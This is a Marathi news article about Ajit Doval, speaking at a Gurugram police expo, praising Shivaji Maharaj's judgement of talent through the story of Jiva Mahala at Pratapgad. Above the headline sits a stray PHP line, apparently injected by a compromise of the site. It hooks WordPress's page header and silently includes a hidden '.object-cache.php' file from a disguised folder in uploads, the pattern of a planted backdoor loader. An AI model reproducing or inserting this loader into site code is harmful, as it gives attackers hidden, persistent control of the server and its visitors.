add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); अजित डोवाल यांना भावते छत्रपती शिवाजी महाराजांची ही रणनीती – SOCH INDIA
Menu

देश
अजित डोवाल यांना भावते छत्रपती शिवाजी महाराजांची ही रणनीती

nobanner

छत्रपती शिवाजी महाराज यांची रणनीती राष्ट्रीय सुरक्षा सल्लागार अजित डोवाल यांना भावते. त्याबाबत त्यांनी गुरुग्राममध्ये बोलत असताना छत्रपती शिवाजी महाराज यांचं संघटन कौशल्य आणि माणसांची पारख कशी होती हे स्पष्ट केलं. गुरुग्राम येथे पोलीस एक्स्पोच्या उद्घाटन प्रसंगी ते बोलत होते. छत्रपती शिवाजी महाराजांचा आदर्श डोळ्यांसमोर ठेवा आणि कौशल्य तसंच तंत्रज्ञान हे पोलीस खात्यातील शेवटच्या माणसापर्यंत पोहचवा असंही डोवाल यांनी स्पष्ट केलं.

” पोलीस आधुनिक होणं म्हणजे ते टेक्नोसॅव्ही होणं एवढाच नाही. तर हे तंत्रज्ञान पोलीस खात्यातील शेवटच्या माणसापर्यंत कसे पोहचवायचे आणि त्याचा उपयोग कसा करायचा हा कळीचा मुद्दा आहे. एका चांगल्या नेत्यामध्ये हेच नेतृत्वगुण असले पाहिजेत. तरच प्रत्येक व्यक्तीतील क्षमतेचा पुरेपूर उपयोग होऊ शकतो आणि अगदी शेवटच्या माणसालाही त्या नेत्याचे महत्त्व कळतं. ” असं डोवाल यांनी म्हटलं आहे.

छत्रपती शिवाजी महाराजांबाबत काय म्हणाले अजित डोवाल?
“छत्रपती शिवाजी महाराज हे कुशल नेतृत्त्वाचं उत्तम उदाहरण होते. एकदा घोड्यावरुन जात असताना शिवरायांनी एका व्यक्तीला उत्तम रितीने दांडपट्टा चालवताना पाहिलं. तो दांडपट्टा फिरवायचा आणि उडते पक्षी मारायचा. छत्रपती शिवाजी महाराजांनी त्याला आपल्या सैन्यात सहभागी करुन घेतलं. त्याला प्रशिक्षण दिलं. त्याच्या कौशल्यास पैलू पाडले. त्याचं नाव होतं जीवा महाला. छत्रपती शिवाजी महाराज जेव्हा प्रतापगडावर अफझल खानाला भेटले तेव्हा त्यांच्या सोबत होता जीवा महाला. तर अफझल खानासोबत होता सय्यद बंडा. भेटी दरम्यान अफझल खानाने दगा केला आणि छत्रपती शिवाजी महाराजांवर वार केला. शिवरायांनी चिलखत घातलं होतं त्यामुळे खानाचा वार फुकट गेला. त्याचवेळी छत्रपती शिवाजी महाराजांवर वार करण्यासाठी सय्यद बंडा धावून आला. त्याच्या हातात तलवार होती, ती तो महाराजांवर चालवणार इतक्यात अत्यंत चपळाईने जीवा महालाने बंडावर तलवार चालवली ज्यामुळे सय्यद बंडाचा हात खांद्यापासून तुटला. छत्रपती शिवाजी महाराजांचं नेतृत्व कौशल्य इथेच दिसून येतं. जीवा महाला काय करु शकतो याची पूर्ण कल्पना छत्रपती शिवाजी महाराजांना होती. आपल्या माणसाचे कौशल्य अशा प्रकारे विकसित करायला हवं की प्रत्येक पोलीस जीवा महाला झाला पाहिजे.” असंही अजित डोवाल यांनी म्हटलं आहे.